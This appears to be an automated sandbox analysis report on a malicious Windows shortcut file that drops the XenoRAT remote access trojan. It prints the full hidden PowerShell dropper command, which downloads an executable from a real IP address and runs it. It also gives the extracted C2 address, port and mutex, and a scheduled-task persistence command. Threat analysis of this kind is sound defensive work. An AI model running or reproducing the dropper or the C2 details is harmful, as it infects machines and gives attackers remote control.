Analysis

  • max time kernel
    150s
  • max time network
    158s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240709-en
  • resource tags
    arch:x64, arch:x86, image:win10v2004-20240709-en, locale:en-us, os:windows10-2004-x64, system
  • submitted
    27-07-2024 09:38

General

  • Target

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk

  • Size

    2KB

  • MD5

    4db66f511c6604f1be1ae032b84f8358

  • SHA1

    8ab73293cf42ead05326874845622cea78822c8f

  • SHA256

    1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7

  • SHA512

    2cf294db093bbe00ce504d2817dced1d62d7eb8af4a7183836fb4af0288f7e5018cd2226bea522ad5464b911317bd184bb36303e766fa4a59239f87878510c67

Malware Config

Extracted

Language: ps1

Source:

-hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';

URLs:

  • exe.dropper
    http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe

Extracted

Family

xenorat

C2

45.66.231.63

Mutex

Holid_rat_nd8859g

Attributes
  • delay

    60400

  • install_path

    appdata

  • port

    1243

  • startup_name

    HDdisplay

Signatures

  • XenorRat

    XenorRat is a remote access trojan written in C#.

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Runs PowerShell and hides the display window.

  • Downloads MZ/PE file
  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 12 IoCs
  • Suspicious use of SetThreadContext 8 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 4 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

    Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.

  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\1e2f9bb7d4aee809ae89704f6225503bf72b09ca897986ab70a00332fdf10ae7.lnk
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4856
    • C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\PoWersheLl.exe" -ExecutionPolicy -Bypass -WindowStyle hiDdEn -hiDdEn -Command PkgMgr.exe;(new-object System.Net.WebClient).DownloadFile('http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe','DisplayResolution.exe');./'DisplayResolution.exe';(get-item 'DisplayResolution.exe').Attributes += 'Hidden';
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1816
      • C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe
        "C:\Users\Admin\AppData\Local\Temp\DisplayResolution.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:60
        • C:\Windows\SysWOW64\cmd.exe
          C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\eystsdf.cmd" "
          4⤵
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:2536
          • C:\Users\Admin\AppData\Roaming\efthfxj.sfx.exe
            efthfxj.sfx.exe -pgtrfdewscbsdyethnymkdesppodtyuhngfszafugyRhvqxsdfHbgnmeG -dC:\Users\Admin\AppData\Roaming
            5⤵
            • Checks computer location settings
            • Executes dropped EXE
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:2800
            • C:\Users\Admin\AppData\Roaming\efthfxj.exe
              "C:\Users\Admin\AppData\Roaming\efthfxj.exe"
              6⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • System Location Discovery: System Language Discovery
              • Suspicious use of AdjustPrivilegeToken
              • Suspicious use of WriteProcessMemory
              PID:5116
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Checks computer location settings
                • Executes dropped EXE
                • System Location Discovery: System Language Discovery
                • Suspicious use of WriteProcessMemory
                PID:4852
                • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                  "C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe"
                  8⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • System Location Discovery: System Language Discovery
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:3196
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:4876
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4876 -s 84
                      10⤵
                      • Program crash
                      PID:3892
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:4788
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 4788 -s 80
                      10⤵
                      • Program crash
                      PID:3968
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    PID:1236
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 1236 -s 80
                      10⤵
                      • Program crash
                      PID:2156
                  • C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    C:\Users\Admin\AppData\Roaming\XenoManager\efthfxj.exe
                    9⤵
                    • Executes dropped EXE
                    • System Location Discovery: System Language Discovery
                    PID:2164
                    • C:\Windows\SysWOW64\schtasks.exe
                      "schtasks.exe" /Create /TN "HDdisplay" /XML "C:\Users\Admin\AppData\Local\Temp\tmp35BC.tmp" /F
                      10⤵
                      • System Location Discovery: System Language Discovery
                      • Scheduled Task/Job: Scheduled Task
                      PID:5104
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                PID:1428
                • C:\Windows\SysWOW64\WerFault.exe
                  C:\Windows\SysWOW64\WerFault.exe -u -p 1428 -s 80
                  8⤵
                  • Program crash
                  PID:4548
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                • Suspicious use of UnmapMainImage
                PID:776
              • C:\Users\Admin\AppData\Roaming\efthfxj.exe
                C:\Users\Admin\AppData\Roaming\efthfxj.exe
                7⤵
                • Executes dropped EXE
                PID:4820
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 1428 -ip 1428
    1⤵
    PID:1960
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 776 -ip 776
    1⤵
    PID:4128
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 4820 -ip 4820
    1⤵
    PID:2488
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4876 -ip 4876
    1⤵
    PID:3528
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4788 -ip 4788
    1⤵
    PID:2816
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1236 -ip 1236
    1⤵
    PID:4780

Network

              • flag-us
                DNS
                217.106.137.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.106.137.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                172.214.232.199.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                172.214.232.199.in-addr.arpa
                IN PTR
                Response
              • flag-nl
                GET
                http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
                PoWersheLl.exe
                Remote address:
                94.156.67.244:5679
                Request
                GET /abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe HTTP/1.1
                Host: 94.156.67.244:5679
                Connection: Keep-Alive
                Response
                HTTP/1.1 200 OK
                Server: nginx/1.10.3
                Date: Sat, 27 Jul 2024 09:40:18 GMT
                Content-Type: application/octet-stream
                Content-Length: 629724
                Last-Modified: Sat, 27 Jul 2024 06:37:56 GMT
                Connection: keep-alive
                ETag: "66a495c4-99bdc"
                Accept-Ranges: bytes
              • flag-us
                DNS
                g.bing.com
                Remote address:
                8.8.8.8:53
                Request
                g.bing.com
                IN A
                Response
                g.bing.com
                IN CNAME
                g-bing-com.dual-a-0034.a-msedge.net
                g-bing-com.dual-a-0034.a-msedge.net
                IN CNAME
                dual-a-0034.a-msedge.net
                dual-a-0034.a-msedge.net
                IN A
                204.79.197.237
                dual-a-0034.a-msedge.net
                IN A
                13.107.21.237
              • flag-us
                DNS
                244.67.156.94.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                244.67.156.94.in-addr.arpa
                IN PTR
                Response
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; SameSite=None; Secure; Priority=High;
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 1EA0C797C2394F21ABCB740B17F38FC4 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                set-cookie: MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM; domain=.bing.com; expires=Thu, 21-Aug-2025 09:40:23 GMT; path=/; Partitioned; secure; SameSite=None
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: C9C77E08551E4C50802603FF473BD1C3 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                GET
                https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Remote address:
                204.79.197.237:443
                Request
                GET /neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid= HTTP/2.0
                host: g.bing.com
                accept-encoding: gzip, deflate
                user-agent: WindowsShellClient/9.0.40929.0 (Windows)
                cookie: MUID=11DD43C306FA6C7724A0570A07DD6DF8; MSPTC=lUR2t-R3pzz_JvIerSdSItBBMBWqRBqXLOZ--K7TqLM
                Response
                HTTP/2.0 204
                cache-control: no-cache, must-revalidate
                pragma: no-cache
                expires: Fri, 01 Jan 1990 00:00:00 GMT
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                access-control-allow-origin: *
                x-cache: CONFIG_NOCACHE
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: EC06ACEB9EBB42CABFBC613FF00ADF67 Ref B: LON04EDGE0614 Ref C: 2024-07-27T09:40:23Z
                date: Sat, 27 Jul 2024 09:40:22 GMT
              • flag-us
                DNS
                237.197.79.204.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                237.197.79.204.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                17.160.190.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                17.160.190.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                55.36.223.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                55.36.223.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                228.249.119.40.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                228.249.119.40.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                183.142.211.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                183.142.211.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                26.165.165.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                26.165.165.52.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                56.126.166.20.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                56.126.166.20.in-addr.arpa
                IN PTR
                Response
              • flag-us
                DNS
                217.135.221.88.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                217.135.221.88.in-addr.arpa
                IN PTR
                Response
                217.135.221.88.in-addr.arpa
                IN PTR
                a88-221-135-217deploystaticakamaitechnologiescom
              • flag-us
                DNS
                tse1.mm.bing.net
                Remote address:
                8.8.8.8:53
                Request
                tse1.mm.bing.net
                IN A
                Response
                tse1.mm.bing.net
                IN CNAME
                mm-mm.bing.net.trafficmanager.net
                mm-mm.bing.net.trafficmanager.net
                IN CNAME
                ax-0001.ax-msedge.net
                ax-0001.ax-msedge.net
                IN A
                150.171.28.10
                ax-0001.ax-msedge.net
                IN A
                150.171.27.10
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 525311
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: D322E6E5001B4C96AD331F29DFBBF045 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 589683
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: 2FDB249C2C7A47CA908B83FB37FF85DB Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 592830
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: B34D85E3DFFA43C5AAFE69D8AD8FB4AC Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                GET
                https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Remote address:
                150.171.28.10:443
                Request
                GET /th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90 HTTP/2.0
                host: tse1.mm.bing.net
                accept: */*
                accept-encoding: gzip, deflate, br
                user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041
                Response
                HTTP/2.0 200
                cache-control: public, max-age=2592000
                content-length: 575578
                content-type: image/jpeg
                x-cache: TCP_HIT
                access-control-allow-origin: *
                access-control-allow-headers: *
                access-control-allow-methods: GET, POST, OPTIONS
                timing-allow-origin: *
                report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth&ndcParam=QUZE"}]}
                nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
                accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                x-msedge-ref: Ref A: F5BCBD33E8C04898B812E1FADA2EEAF5 Ref B: LON04EDGE1215 Ref C: 2024-07-27T09:42:07Z
                date: Sat, 27 Jul 2024 09:42:06 GMT
              • flag-us
                DNS
                66.112.168.52.in-addr.arpa
                Remote address:
                8.8.8.8:53
                Request
                66.112.168.52.in-addr.arpa
                IN PTR
                Response
              • 94.156.67.244:5679
                URL: http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
                Protocol: http
                Process: PoWersheLl.exe
                Sent: 12.7kB / 257 packets
                Received: 648.7kB / 467 packets
                HTTP Request: GET http://94.156.67.244:5679/abincontents/sthdytjdtuoigfyuqurbjzksbfgbshbfabirgtrht/ioihirabgbrdhbgwhkebgrsryftsevrfsyubkhabvyrgbksdtg/Display1.exe
                HTTP Response: 200
              • 204.79.197.237:443
                URL: https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                Protocol: tls, http2
                Sent: 2.0kB / 22 packets
                Received: 9.4kB / 20 packets
                HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                HTTP Response: 204
                HTTP Request: GET https://g.bing.com/neg/0?action=emptycreative&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                HTTP Response: 204
                HTTP Request: GET https://g.bing.com/neg/0?action=emptycreativeimpression&adUnitId=11730597&publisherId=251978541&rid=dd80dd7c8c6c405e899517b2b0f616b6&localId=w:7644E81C-AD49-10CC-B943-5E44723BEB42&deviceId=6896204247012457&anid=
                HTTP Response: 204
              • 45.66.231.63:1243
                Process: efthfxj.exe
                Sent: 260 B / 5 packets
              • 150.171.28.10:443
                Host: tse1.mm.bing.net
                Protocol: tls, http2
                Sent: 1.2kB / 15 packets
                Received: 6.9kB / 13 packets
              • 150.171.28.10:443
                Host: tse1.mm.bing.net
                Protocol: tls, http2
                Sent: 1.2kB / 15 packets
                Received: 6.9kB / 13 packets
              • 150.171.28.10:443
                URL: https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                Protocol: tls, http2
                Sent: 80.1kB / 1716 packets
                Received: 2.4MB / 1712 packets
                HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239340418590_1Z5SLYPYIFLU5OB7B&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388057_1GGG85785BK7BP6Y7&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
                HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239340418589_1A7GR0X7EOYKFPJ56&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                HTTP Request: GET https://tse1.mm.bing.net/th?id=OADD2.10239339388056_1O9WMGQV7BVEGHO4D&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=1920&h=1080&dynsize=1&qlt=90
                HTTP Response: 200
                HTTP Response: 200
                HTTP Response: 200
                HTTP Response: 200
              • 150.171.28.10:443
                Host: tse1.mm.bing.net
                Protocol: tls, http2
                Sent: 1.2kB / 15 packets
                Received: 6.9kB / 13 packets
              • 45.66.231.63:1243
                Process: efthfxj.exe
                Sent: 260 B / 5 packets
              • 8.8.8.8:53
                Domain: 217.106.137.52.in-addr.arpa
                Protocol: dns
                Sent: 73 B / 1 packet
                Received: 147 B / 1 packet
                DNS Request: 217.106.137.52.in-addr.arpa
              • 8.8.8.8:53
                Domain: 172.214.232.199.in-addr.arpa
                Protocol: dns
                Sent: 74 B / 1 packet
                Received: 128 B / 1 packet
                DNS Request: 172.214.232.199.in-addr.arpa
              • 8.8.8.8:53
                Domain: g.bing.com
                Protocol: dns
                Sent: 128 B / 2 packets
                Received: 283 B / 2 packets
                DNS Request: g.bing.com
                DNS Response: 204.79.197.237, 13.107.21.237
                DNS Request: 244.67.156.94.in-addr.arpa
              • 8.8.8.8:53
                Domain: 237.197.79.204.in-addr.arpa
                Protocol: dns
                Sent: 73 B / 1 packet
                Received: 143 B / 1 packet
                DNS Request: 237.197.79.204.in-addr.arpa
              • 8.8.8.8:53
                Domain: 17.160.190.20.in-addr.arpa
                Protocol: dns
                Sent: 72 B / 1 packet
                Received: 158 B / 1 packet
                DNS Request: 17.160.190.20.in-addr.arpa
              • 8.8.8.8:53
                Domain: 55.36.223.20.in-addr.arpa
                Protocol: dns
                Sent: 71 B / 1 packet
                Received: 157 B / 1 packet
                DNS Request: 55.36.223.20.in-addr.arpa
              • 8.8.8.8:53
                Domain: 228.249.119.40.in-addr.arpa
                Protocol: dns
                Sent: 73 B / 1 packet
                Received: 159 B / 1 packet
                DNS Request: 228.249.119.40.in-addr.arpa
              • 8.8.8.8:53
                Domain: 183.142.211.20.in-addr.arpa
                Protocol: dns
                Sent: 73 B / 1 packet
                Received: 159 B / 1 packet
                DNS Request: 183.142.211.20.in-addr.arpa
              • 8.8.8.8:53
                Domain: 26.165.165.52.in-addr.arpa
                Protocol: dns
                Sent: 72 B / 1 packet
                Received: 146 B / 1 packet
                DNS Request: 26.165.165.52.in-addr.arpa
              • 8.8.8.8:53
                Domain: 56.126.166.20.in-addr.arpa
                Protocol: dns
                Sent: 72 B / 1 packet
                Received: 158 B / 1 packet
                DNS Request: 56.126.166.20.in-addr.arpa
              • 8.8.8.8:53
                Domain: 217.135.221.88.in-addr.arpa
                Protocol: dns
                Sent: 73 B / 1 packet
                Received: 139 B / 1 packet
                DNS Request: 217.135.221.88.in-addr.arpa
